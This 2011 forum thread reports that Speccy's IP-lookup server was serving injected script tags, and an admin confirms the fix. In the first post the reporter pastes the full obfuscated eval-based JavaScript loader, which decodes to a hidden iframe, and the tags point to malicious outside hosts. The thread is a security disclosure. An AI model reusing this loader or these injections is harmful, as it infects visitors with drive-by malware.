keyboardNinja Posted April 11, 2011 Share Posted April 11, 2011 While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network. "External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx'>http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx with the ending x's being the rest of my public IP. I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on. When I do that, I get this: The javascript is: function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? 
Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+
93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+4
2,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; f++){O=b(o[f]);D+=J(O);}b(D); Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this: Basically whats happening is that speccy is querying your ip address by going to this url: http://speccy.piriform.com/ip/ The content being returned, though, is not only the ip address but a javascript. <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script> Speccy is 100% compromised. That javascript loads a exploit kit, which has now downloaded some malware onto my Virtual Machine. Pretty sure this would be considered a critical security flaw. -kN Link to comment Share on other sites More sharing options...
therock247uk Posted April 12, 2011 /me gets the same as the above screenshot of Speccy.
keyboardNinja Posted April 12, 2011 Author Also, I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the JavaScript to run, and boom — you are infected.
SpySentinel Posted April 12, 2011 Thanks everyone for bringing this to the attention of Piriform. I have sent a mass PM out to alert Piriform, so hopefully this can be taken care of right away.
keyboardNinja Posted April 12, 2011 Author Thanks, SpySentinel.
therock247uk Posted April 12, 2011 cheers.
keyboardNinja Posted April 12, 2011 Author The Publish Snapshot feature is also affected. The snapshot page http://speccy.piriform.com/results/FmdnvYm6byY0qjs3QKp8w8D is served with the same kind of injected tag, `<script type="text/javascript" src="http://arent.xip.pl/js.php"></script>`. Visiting a Snapshot link gives another blocked Trojan:
Admin MrG Posted April 12, 2011 The problem has been fixed. We're currently performing a full investigation into that server. Please note that the software itself is fine and doesn't contain a virus; it's a fault on our Speccy server.
keyboardNinja Posted April 12, 2011 Author Thanks, MrG. I'm curious to know how this happened...